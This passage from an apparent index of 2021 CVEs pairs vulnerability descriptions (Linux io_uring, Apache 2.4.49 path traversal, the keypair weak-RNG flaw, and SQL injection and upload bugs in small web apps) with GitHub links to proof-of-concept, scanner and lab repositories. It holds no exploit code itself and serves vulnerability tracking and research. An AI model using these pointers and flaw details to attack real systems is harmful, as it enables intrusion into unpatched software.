loop_rw_iter in fs/io_uring.c in the Linux kernel 5.10 through 5.14.6 allows local users to gain privileges by using IORING_OP_PROVIDE_BUFFERS to trigger a free of a kernel buffer, as demonstrated by using /proc/<pid>/maps for exploitation.

- [chompie1337/Linux_LPE_io_uring_CVE-2021-41073](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073)

### CVE-2021-41074
- [dillonkirsch/CVE-2021-41074](https://github.com/dillonkirsch/CVE-2021-41074)

### CVE-2021-41078 (2021-10-26)

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

- [s-index/CVE-2021-41078](https://github.com/s-index/CVE-2021-41078)

### CVE-2021-41081 (2021-11-11)

Zoho ManageEngine Network Configuration Manager before 125465 is vulnerable to SQL Injection in a configuration search.

- [sudaiv/CVE-2021-41081](https://github.com/sudaiv/CVE-2021-41081)

### CVE-2021-41091 (2021-10-04)

Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade, limit access to the host to trusted users and limit access to host volumes to trusted containers.

- [UncleJ4ck/CVE-2021-41091](https://github.com/UncleJ4ck/CVE-2021-41091)
- [jrbH4CK/CVE-2021-41091](https://github.com/jrbH4CK/CVE-2021-41091)
- [SNE-M23-SN/Vulnerable-Docker-Engine](https://github.com/SNE-M23-SN/Vulnerable-Docker-Engine)

### CVE-2021-41117 (2021-10-11)

keypair is an RSA PEM key generator written in JavaScript. keypair implements a lot of cryptographic primitives on its own or by borrowing from other libraries where possible, including node-forge. An issue was discovered where this library was generating identical RSA keys used in SSH. This would mean that the library is generating identical P, Q (and thus N) values which, in practical terms, is impossible with RSA-2048 keys. Generating identical values, repeatedly, usually indicates an issue with poor random number generation, or poor handling of CSPRNG output.

Issue 1: Poor random number generation (`GHSL-2021-1012`). The library does not rely entirely on a platform-provided CSPRNG; rather, it uses its own counter-based CMAC approach. Where things go wrong is seeding the CMAC implementation with "true" random data in the function `defaultSeedFile`. In order to seed the AES-CMAC generator, the library will take two different approaches depending on the JavaScript execution environment. In a browser, the library will use [`window.crypto.getRandomValues()`](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971). However, in a Node.js execution environment, the `window` object is not defined, so it goes down a much less secure path, which also has a bug in it. It does look like the library tries to use Node's CSPRNG when possible; unfortunately, it looks like the `crypto` object is null because a variable was declared with the same name and set to `null`, so the Node CSPRNG path is never taken. Instead, when `window.crypto.getRandomValues()` is not available, a Lehmer LCG random number generator is used to seed the CMAC counter, and the LCG is seeded with `Math.random`. While this is poor and would likely qualify as a security bug in itself, it does not explain the extreme frequency with which duplicate keys occur.

The main flaw: The output from the Lehmer LCG is encoded incorrectly. The specific [line](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008) with the flaw is: `b.putByte(String.fromCharCode(next & 0xFF))`. The [definition](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352) of `putByte` is `util.ByteBuffer.prototype.putByte = function(b) {this.data += String.fromCharCode(b);};`. Simplified, this is `String.fromCharCode(String.fromCharCode(next & 0xFF))`. The double `String.fromCharCode` is almost certainly unintentional and the source of weak seeding. Unfortunately, this does not result in an error. Rather, it results in most of the buffer containing zeros. Since we are masking with 0xFF, we can determine that 97% of the output from the LCG is converted to zeros. The only outputs that result in meaningful values are outputs 48 through 57, inclusive. The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9.

In summary, there are three immediate concerns:

1. The library has an insecure random number fallback path. Ideally the library would require a strong CSPRNG instead of attempting to use an LCG and `Math.random`.
2. The library does not correctly use a strong random number generator when run in Node.js, even though a strong CSPRNG is available.
3. The fallback path has an issue in the implementation where a majority of the seed data is going to effectively be zero.

Due to the poor random number generation, keypair generates RSA keys that are relatively easy to guess. This could enable an attacker to decrypt confidential messages or gain unauthorized access to an account belonging to the victim.

- [badkeys/keypairvuln](https://github.com/badkeys/keypairvuln)

### CVE-2021-41160 (2021-10-21)

FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out-of-bounds writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width/height or out-of-bounds rectangles to trigger out-of-bounds writes. With `0` width or height the memory allocation will be `0`, but the missing bounds checks allow writing to the pointer at this (not allocated) region. This issue has been patched in FreeRDP 2.4.1.

- [Jajangjaman/CVE-2021-41160](https://github.com/Jajangjaman/CVE-2021-41160)

### CVE-2021-41182 (2021-10-26)

jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS selector. A workaround is to not accept the value of the `altField` option from untrusted sources.

- [aredspy/CVE-2021-41182](https://github.com/aredspy/CVE-2021-41182)
- [aredspy/CVE-2021-41182-Tester](https://github.com/aredspy/CVE-2021-41182-Tester)

### CVE-2021-41184 (2021-10-26)

jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `of` option of the `.position()` util from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. A workaround is to not accept the value of the `of` option from untrusted sources.

- [gabrielolivra/Exploit-Medium-CVE-2021-41184](https://github.com/gabrielolivra/Exploit-Medium-CVE-2021-41184)

### CVE-2021-41277 (2021-11-17)

Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.

- [Seals6/CVE-2021-41277](https://github.com/Seals6/CVE-2021-41277)
- [tahtaciburak/CVE-2021-41277](https://github.com/tahtaciburak/CVE-2021-41277)
- [Henry4E36/Metabase-cve-2021-41277](https://github.com/Henry4E36/Metabase-cve-2021-41277)
- [kap1ush0n/CVE-2021-41277](https://github.com/kap1ush0n/CVE-2021-41277)
- [z3n70/CVE-2021-41277](https://github.com/z3n70/CVE-2021-41277)
- [kaizensecurity/CVE-2021-41277](https://github.com/kaizensecurity/CVE-2021-41277)
- [Vulnmachines/Metabase_CVE-2021-41277](https://github.com/Vulnmachines/Metabase_CVE-2021-41277)
- [TheLastVvV/CVE-2021-41277](https://github.com/TheLastVvV/CVE-2021-41277)
- [zer0yu/CVE-2021-41277](https://github.com/zer0yu/CVE-2021-41277)
- [sasukeourad/CVE-2021-41277_SSRF](https://github.com/sasukeourad/CVE-2021-41277_SSRF)
- [frknktlca/Metabase_Nmap_Script](https://github.com/frknktlca/Metabase_Nmap_Script)
- [chengling-ing/CVE-2021-41277](https://github.com/chengling-ing/CVE-2021-41277)
- [RubXkuB/PoC-Metabase-CVE-2021-41277](https://github.com/RubXkuB/PoC-Metabase-CVE-2021-41277)

### CVE-2021-41338 (2021-10-13)

Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability

- [Mario-Kart-Felix/firewall-cve](https://github.com/Mario-Kart-Felix/firewall-cve)

### CVE-2021-41349 (2021-11-10)

Microsoft Exchange Server Spoofing Vulnerability

- [0xrobiul/CVE-2021-41349](https://github.com/0xrobiul/CVE-2021-41349)

### CVE-2021-41351 (2021-11-10)

Microsoft Edge (Chrome based) Spoofing on IE Mode

- [JaneMandy/CVE-2021-41351-POC](https://github.com/JaneMandy/CVE-2021-41351-POC)

### CVE-2021-41381 (2021-09-23)

Payara Micro Community 5.2021.6 and below allows Directory Traversal.

- [Net-hunter121/CVE-2021-41381](https://github.com/Net-hunter121/CVE-2021-41381)

### CVE-2021-41511 (2021-10-04)

The username and password fields of the login form in Lodging Reservation Management System V1 allow any user to bypass authentication via SQL injection.

- [vidvansh/CVE-2021-41511](https://github.com/vidvansh/CVE-2021-41511)

### CVE-2021-41560 (2021-12-15)

OpenCATS through 0.9.6 allows remote attackers to execute arbitrary code by uploading an executable file via lib/FileUtility.php.

- [Nickguitar/RevCAT](https://github.com/Nickguitar/RevCAT)

### CVE-2021-41643 (2021-10-29)

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field.

- [hax3xploit/CVE-2021-41643](https://github.com/hax3xploit/CVE-2021-41643)

### CVE-2021-41644 (2021-10-29)

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters.

- [hax3xploit/CVE-2021-41644](https://github.com/hax3xploit/CVE-2021-41644)

### CVE-2021-41645 (2021-10-29)

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field.

- [hax3xploit/CVE-2021-41645](https://github.com/hax3xploit/CVE-2021-41645)

### CVE-2021-41646 (2021-10-29)

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.

- [hax3xploit/CVE-2021-41646](https://github.com/hax3xploit/CVE-2021-41646)

### CVE-2021-41647 (2021-10-01)

An unauthenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user.

- [MobiusBinary/CVE-2021-41647](https://github.com/MobiusBinary/CVE-2021-41647)

### CVE-2021-41648 (2021-10-01)

An unauthenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. The POST request handler does not sanitize the user input.

- [MobiusBinary/CVE-2021-41648](https://github.com/MobiusBinary/CVE-2021-41648)

### CVE-2021-41649 (2021-10-01)

An unauthenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. The POST request handler does not sanitize the user input.

- [MobiusBinary/CVE-2021-41649](https://github.com/MobiusBinary/CVE-2021-41649)

### CVE-2021-41651 (2021-10-04)

A blind SQL injection vulnerability exists in the Raymart DG / Ahmed Helal Hotel-mgmt-system. A malicious attacker can retrieve sensitive database information and interact with the database using the vulnerable cid parameter in process_update_profile.php.

- [MobiusBinary/CVE-2021-41651](https://github.com/MobiusBinary/CVE-2021-41651)

### CVE-2021-41653 (2021-11-13)

The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.

- [likeww/CVE-2021-41653](https://github.com/likeww/CVE-2021-41653)

### CVE-2021-41730
- [yezeting/CVE-2021-41730](https://github.com/yezeting/CVE-2021-41730)

### CVE-2021-41773 (2021-10-05)

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

- [Vulnmachines/cve-2021-41773](https://github.com/Vulnmachines/cve-2021-41773)
- [numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773)
- [knqyf263/CVE-2021-41773](https://github.com/knqyf263/CVE-2021-41773)
- [ZephrFish/CVE-2021-41773-PoC](https://github.com/ZephrFish/CVE-2021-41773-PoC)
- [iilegacyyii/PoC-CVE-2021-41773](https://github.com/iilegacyyii/PoC-CVE-2021-41773)
- [masahiro331/CVE-2021-41773](https://github.com/masahiro331/CVE-2021-41773)
- [j4k0m/CVE-2021-41773](https://github.com/j4k0m/CVE-2021-41773)
- [TishcaTpx/POC-CVE-2021-41773](https://github.com/TishcaTpx/POC-CVE-2021-41773)
- [lorddemon/CVE-2021-41773-PoC](https://github.com/lorddemon/CVE-2021-41773-PoC)
- [Ls4ss/CVE-2021-41773_CVE-2021-42013](https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013)
- [itsecurityco/CVE-2021-41773](https://github.com/itsecurityco/CVE-2021-41773)
- [habibiefaried/CVE-2021-41773-PoC](https://github.com/habibiefaried/CVE-2021-41773-PoC)
- [creadpag/CVE-2021-41773-POC](https://github.com/creadpag/CVE-2021-41773-POC)
- [TAI-REx/cve-2021-41773-nse](https://github.com/TAI-REx/cve-2021-41773-nse)
- [blasty/CVE-2021-41773](https://github.com/blasty/CVE-2021-41773)
- [PentesterGuruji/CVE-2021-41773](https://github.com/PentesterGuruji/CVE-2021-41773)
- [jbovet/CVE-2021-41773](https://github.com/jbovet/CVE-2021-41773)
- [mohwahyudi/cve-2021-41773](https://github.com/mohwahyudi/cve-2021-41773)
- [1nhann/CVE-2021-41773](https://github.com/1nhann/CVE-2021-41773)
- [ranggaggngntt/CVE-2021-41773](https://github.com/ranggaggngntt/CVE-2021-41773)
- [BlueTeamSteve/CVE-2021-41773](https://github.com/BlueTeamSteve/CVE-2021-41773)
- [Zeop-CyberSec/apache_normalize_path](https://github.com/Zeop-CyberSec/apache_normalize_path)
- [r00tVen0m/CVE-2021-41773](https://github.com/r00tVen0m/CVE-2021-41773)
- [n3k00n3/CVE-2021-41773](https://github.com/n3k00n3/CVE-2021-41773)
- [fnatalucci/CVE-2021-41773-RCE](https://github.com/fnatalucci/CVE-2021-41773-RCE)
- [AssassinUKG/CVE-2021-41773](https://github.com/AssassinUKG/CVE-2021-41773)
- [jheeree/Simple-CVE-2021-41773-checker](https://github.com/jheeree/Simple-CVE-2021-41773-checker)
- [orangmuda/CVE-2021-41773](https://github.com/orangmuda/CVE-2021-41773)
- [HightechSec/scarce-apache2](https://github.com/HightechSec/scarce-apache2)
- [vinhjaxt/CVE-2021-41773-exploit](https://github.com/vinhjaxt/CVE-2021-41773-exploit)
- [sixpacksecurity/CVE-2021-41773](https://github.com/sixpacksecurity/CVE-2021-41773)
- [Hattan515/POC-CVE-2021-41773](https://github.com/Hattan515/POC-CVE-2021-41773)
- [twseptian/cve-2021-41773](https://github.com/twseptian/cve-2021-41773)
- [noflowpls/CVE-2021-41773](https://github.com/noflowpls/CVE-2021-41773)
- [McSl0vv/CVE-2021-41773](https://github.com/McSl0vv/CVE-2021-41773)
- [shiomiyan/CVE-2021-41773](https://github.com/shiomiyan/CVE-2021-41773)
- [justakazh/mass_cve-2021-41773](https://github.com/justakazh/mass_cve-2021-41773)
- [Sakura-nee/CVE-2021-41773](https://github.com/Sakura-nee/CVE-2021-41773)
- [shellreaper/CVE-2021-41773](https://github.com/shellreaper/CVE-2021-41773)
- [0xRar/CVE-2021-41773](https://github.com/0xRar/CVE-2021-41773)
- [pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt)
- [corelight/CVE-2021-41773](https://github.com/corelight/CVE-2021-41773)
- [zeronine9/CVE-2021-41773](https://github.com/zeronine9/CVE-2021-41773)
- [b1tsec/CVE-2021-41773](https://github.com/b1tsec/CVE-2021-41773)
- [superzerosec/CVE-2021-41773](https://github.com/superzerosec/CVE-2021-41773)
- [im-hanzou/apachrot](https://github.com/im-hanzou/apachrot)
- [inbug-team/CVE-2021-41773_CVE-2021-42013](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013)
- [5gstudent/cve-2021-41773-and-cve-2021-42013](https://github.com/5gstudent/cve-2021-41773-and-cve-2021-42013)
- [EagleTube/CVE-2021-41773](https://github.com/EagleTube/CVE-2021-41773)
- [apapedulimu/Apachuk](https://github.com/apapedulimu/Apachuk)
- [scarmandef/CVE-2021-41773](https://github.com/scarmandef/CVE-2021-41773)
- [ksanchezcld/httpd-2.4.49](https://github.com/ksanchezcld/httpd-2.4.49)
- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal)
- [theLSA/apache-httpd-path-traversal-checker](https://github.com/theLSA/apache-httpd-path-traversal-checker)
- [LudovicPatho/CVE-2021-41773](https://github.com/LudovicPatho/CVE-2021-41773)
- [lopqto/CVE-2021-41773_Honeypot](https://github.com/lopqto/CVE-2021-41773_Honeypot)
- [zerodaywolf/CVE-2021-41773_42013](https://github.com/zerodaywolf/CVE-2021-41773_42013)
- [LayarKacaSiber/CVE-2021-41773](https://github.com/LayarKacaSiber/CVE-2021-41773)
- [BabyTeam1024/CVE-2021-41773](https://github.com/BabyTeam1024/CVE-2021-41773)
- [walnutsecurity/cve-2021-41773](https://github.com/walnutsecurity/cve-2021-41773)
- [TheLastVvV/CVE-2021-41773](https://github.com/TheLastVvV/CVE-2021-41773)
- [MazX0p/CVE-2021-41773](https://github.com/MazX0p/CVE-2021-41773)
- [vida003/Scanner-CVE-2021-41773](https://github.com/vida003/Scanner-CVE-2021-41773)
- [mr-exo/CVE-2021-41773](https://github.com/mr-exo/CVE-2021-41773)
- [wolf1892/CVE-2021-41773](https://github.com/wolf1892/CVE-2021-41773)
- [Hydragyrum/CVE-2021-41773-Playground](https://github.com/Hydragyrum/CVE-2021-41773-Playground)
- [IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit](https://github.com/IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit)
- [pirenga/CVE-2021-41773](https://github.com/pirenga/CVE-2021-41773)
- [kubota/POC-CVE-2021-41773](https://github.com/kubota/POC-CVE-2021-41773)
- [xMohamed0/CVE-2021-41773](https://github.com/xMohamed0/CVE-2021-41773)
- [i6c/MASS_CVE-2021-41773](https://github.com/i6c/MASS_CVE-2021-41773)
- [norrig/CVE-2021-41773-exploiter](https://github.com/norrig/CVE-2021-41773-exploiter)
- [m96dg/CVE-2021-41773-exercise](https://github.com/m96dg/CVE-2021-41773-exercise)
- [skentagon/CVE-2021-41773](https://github.com/skentagon/CVE-2021-41773)
- [mauricelambert/CVE-2021-41773](https://github.com/mauricelambert/CVE-2021-41773)
- [the29a/CVE-2021-41773](https://github.com/the29a/CVE-2021-41773)
- [thehackersbrain/CVE-2021-41773](https://github.com/thehackersbrain/CVE-2021-41773)
- [honypot/CVE-2021-41773](https://github.com/honypot/CVE-2021-41773)
- [Fa1c0n35/CVE-2021-41773](https://github.com/Fa1c0n35/CVE-2021-41773)
- [puckiestyle/CVE-2021-41773](https://github.com/puckiestyle/CVE-2021-41773)
- [zer0qs/CVE-2021-41773](https://github.com/zer0qs/CVE-2021-41773)
- [DoTuan1/Reserch-CVE-2021-41773](https://github.com/DoTuan1/Reserch-CVE-2021-41773)
- [bernardas/netsec-polygon](https://github.com/bernardas/netsec-polygon)
- [CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit)
- [vuongnv3389-sec/cve-2021-41773](https://github.com/vuongnv3389-sec/cve-2021-41773)
- [Chocapikk/CVE-2021-41773](https://github.com/Chocapikk/CVE-2021-41773)
- [wangfly-me/Apache_Penetration_Tool](https://github.com/wangfly-me/Apache_Penetration_Tool)
- [anldori/CVE-2021-41773-Scanner](https://github.com/anldori/CVE-2021-41773-Scanner)
- [iosifache/ApacheRCEEssay](https://github.com/iosifache/ApacheRCEEssay)
- [Habib0x0/CVE-2021-41773](https://github.com/Habib0x0/CVE-2021-41773)
- [pwn3z/CVE-2021-41773-Apache-RCE](https://github.com/pwn3z/CVE-2021-41773-Apache-RCE)
- [EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-](https://github.com/EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-)
- [Plunder283/CVE-2021-41773](https://github.com/Plunder283/CVE-2021-41773)
- [mightysai1997/cve-2021-41773](https://github.com/mightysai1997/cve-2021-41773)
- [mightysai1997/CVE-2021-41773h](https://github.com/mightysai1997/CVE-2021-41773h)
- [mightysai1997/cve-2021-41773-v-](https://github.com/mightysai1997/cve-2021-41773-v-)
- [mightysai1997/CVE-2021-41773-i-](https://github.com/mightysai1997/CVE-2021-41773-i-)
- [mightysai1997/CVE-2021-41773-L-](https://github.com/mightysai1997/CVE-2021-41773-L-)
- [mightysai1997/CVE-2021-41773-PoC](https://github.com/mightysai1997/CVE-2021-41773-PoC)
- [mightysai1997/CVE-2021-41773.git1](https://github.com/mightysai1997/CVE-2021-41773.git1)
- [mightysai1997/CVE-2021-41773m](https://github.com/mightysai1997/CVE-2021-41773m)
- [mightysai1997/CVE-2021-41773S](https://github.com/mightysai1997/CVE-2021-41773S)
- [dileepdkumar/LayarKacaSiber-CVE-2021-41773](https://github.com/dileepdkumar/LayarKacaSiber-CVE-2021-41773)
- [aqiao-jashell/CVE-2021-41773](https://github.com/aqiao-jashell/CVE-2021-41773)
- [aqiao-jashell/py-CVE-2021-41773](https://github.com/aqiao-jashell/py-CVE-2021-41773)
- [12345qwert123456/CVE-2021-41773](https://github.com/12345qwert123456/CVE-2021-41773)
- [blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution](https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution)
- [TheKernelPanic/exploit-apache2-cve-2021-41773](https://github.com/TheKernelPanic/exploit-apache2-cve-2021-41773)
- [retrymp3/apache2.4.49VulnerableLabSetup](https://github.com/retrymp3/apache2.4.49VulnerableLabSetup)
- [MatanelGordon/docker-cve-2021-41773](https://github.com/MatanelGordon/docker-cve-2021-41773)
- [0xGabe/Apache-CVEs](https://github.com/0xGabe/Apache-CVEs)
- [OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits](https://github.com/OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits)
- [belajarqywok/CVE-2021-41773-MSF](https://github.com/belajarqywok/CVE-2021-41773-MSF)
- [Iris288/CVE-2021-41773](https://github.com/Iris288/CVE-2021-41773)
- [Maybe4a6f7365/CVE-2021-41773](https://github.com/Maybe4a6f7365/CVE-2021-41773)
- [Zyx2440/Apache-HTTP-Server-2.4.50-RCE](https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE)
- [0xc4t/CVE-2021-41773](https://github.com/0xc4t/CVE-2021-41773)
- [jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773](https://github.com/jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773)

### CVE-2021-41784 (2022-08-29)

Foxit PDF Reader before 11.1 and PDF Editor before 11.1, and PhantomPDF before 10.1.6, allow attackers to trigger a use-after-free and execute arbitrary code because JavaScript is mishandled.

- [Jeromeyoung/CVE-2021-41784](https://github.com/Jeromeyoung/CVE-2021-41784)

### CVE-2021-41805 (2021-12-12)

HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4 has Incorrect Access Control. An ACL token (with the default operator:write permissions) in one namespace can be used for unintended privilege escalation in a different namespace.

- [blackm4c/CVE-2021-41805](https://github.com/blackm4c/CVE-2021-41805)

### CVE-2021-41822
- [badboycxcc/CVE-2021-41822](https://github.com/badboycxcc/CVE-2021-41822)

### CVE-2021-41946 (2022-05-18)

In FiberHome VDSL2 Modem HG150-Ub_V3.0, a stored cross-site scripting (XSS) vulnerability in the Parental Control --> Access Time Restriction --> Username field means that a user cannot delete the rule due to the XSS.

- [afaq1337/CVE-2021-41946](https://github.com/afaq1337/CVE-2021-41946)

### CVE-2021-41962 (2021-12-16)

Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Owner fullname parameter in a Send Service Request in vehicle_service.

- [lohyt/-CVE-2021-41962](https://github.com/lohyt/-CVE-2021-41962)

### CVE-2021-42008 (2021-10-04)

The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.

- [numanturle/CVE-2021-42008](https://github.com/numanturle/CVE-2021-42008)
- [0xdevil/CVE-2021-42008](https://github.com/0xdevil/CVE-2021-42008)

### CVE-2021-42013 (2021-10-07)

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

- [andrea-mattioli/apache-exploit-CVE-2021-42013](https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013)
- [Vulnmachines/cve-2021-42013](https://github.com/Vulnmachines/cve-2021-42013)
- [twseptian/cve-2021-42013-docker-lab](https://github.com/twseptian/cve-2021-42013-docker-lab)
- [LayarKacaSiber/CVE-2021-42013](https://github.com/LayarKacaSiber/CVE-2021-42013)
- [TheLastVvV/CVE-2021-42013](https://github.com/TheLastVvV/CVE-2021-42013)
- [TheLastVvV/CVE-2021-42013_Reverse-Shell](https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell)
- [walnutsecurity/cve-2021-42013](https://github.com/walnutsecurity/cve-2021-42013)
- [robotsense1337/CVE-2021-42013](https://github.com/robotsense1337/CVE-2021-42013)
- [xMohamed0/CVE-2021-42013-ApacheRCE](https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE)
- [asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp](https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp)
- [jas9reet/CVE-2021-42013-LAB](https://github.com/jas9reet/CVE-2021-42013-LAB)
- [mauricelambert/CVE-2021-42013](https://github.com/mauricelambert/CVE-2021-42013)
- [honypot/CVE-2021-42013](https://github.com/honypot/CVE-2021-42013)
- [hadrian3689/apache_2.4.50](https://github.com/hadrian3689/apache_2.4.50)
- [viliuspovilaika/cve-2021-42013](https://github.com/viliuspovilaika/cve-2021-42013)
- [mightysai1997/cve-2021-42013](https://github.com/mightysai1997/cve-2021-42013)
- [mightysai1997/cve-2021-42013L](https://github.com/mightysai1997/cve-2021-42013L)
- [mightysai1997/cve-2021-42013.get](https://github.com/mightysai1997/cve-2021-42013.get)
- [12345qwert123456/CVE-2021-42013](https://github.com/12345qwert123456/CVE-2021-42013)
- [cybfar/cve-2021-42013-httpd](https://github.com/cybfar/cve-2021-42013-httpd)
- [vudala/CVE-2021-42013](https://github.com/vudala/CVE-2021-42013)
- [Hamesawian/CVE-2021-42013](https://github.com/Hamesawian/CVE-2021-42013)
- [K3ysTr0K3R/CVE-2021-42013-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-42013-EXPLOIT)
- [BassoNicolas/CVE-2021-42013](https://github.com/BassoNicolas/CVE-2021-42013)
- [rafifdna/CVE-2021-42013](https://github.com/rafifdna/CVE-2021-42013)
- [dream434/cve-2021-42013-apache](https://github.com/dream434/cve-2021-42013-apache)
- [bananoname/cve-2021-42013](https://github.com/bananoname/cve-2021-42013)

### CVE-2021-42056 (2022-06-24)

Thales Safenet Authentication Client (SAC) for Linux and Windows through 10.7.7 creates insecure temporary hid and lock files allowing a local attacker, through a symlink attack, to overwrite arbitrary files, and potentially achieve arbitrary command execution with high privileges.

- [z00z00z00/Safenet_SAC_CVE-2021-42056](https://github.com/z00z00z00/Safenet_SAC_CVE-2021-42056)

### CVE-2021-42063 (2021-12-14)

A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to the disclosure of sensitive data.

- [Cappricio-Securities/CVE-2021-42063](https://github.com/Cappricio-Securities/CVE-2021-42063)

### CVE-2021-42071 (2021-10-07)

In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.

- [adubaldo/CVE-2021-42071](https://github.com/adubaldo/CVE-2021-42071)

### CVE-2021-42171 (2022-03-14)

Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.

- [minhnq22/CVE-2021-42171](https://github.com/minhnq22/CVE-2021-42171)

### CVE-2021-42183 (2022-05-05)

MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.

- [0xRaw/CVE-2021-42183](https://github.com/0xRaw/CVE-2021-42183)

### CVE-2021-42205 (2022-11-07)

ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice.

- [gmh5225/CVE-2021-42205](https://github.com/gmh5225/CVE-2021-42205)

### CVE-2021-42230 (2022-04-15)

Seowon 130-SLC router all versions as of 2021-09-15 is vulnerable to Remote Code Execution via the queriesCnt parameter.

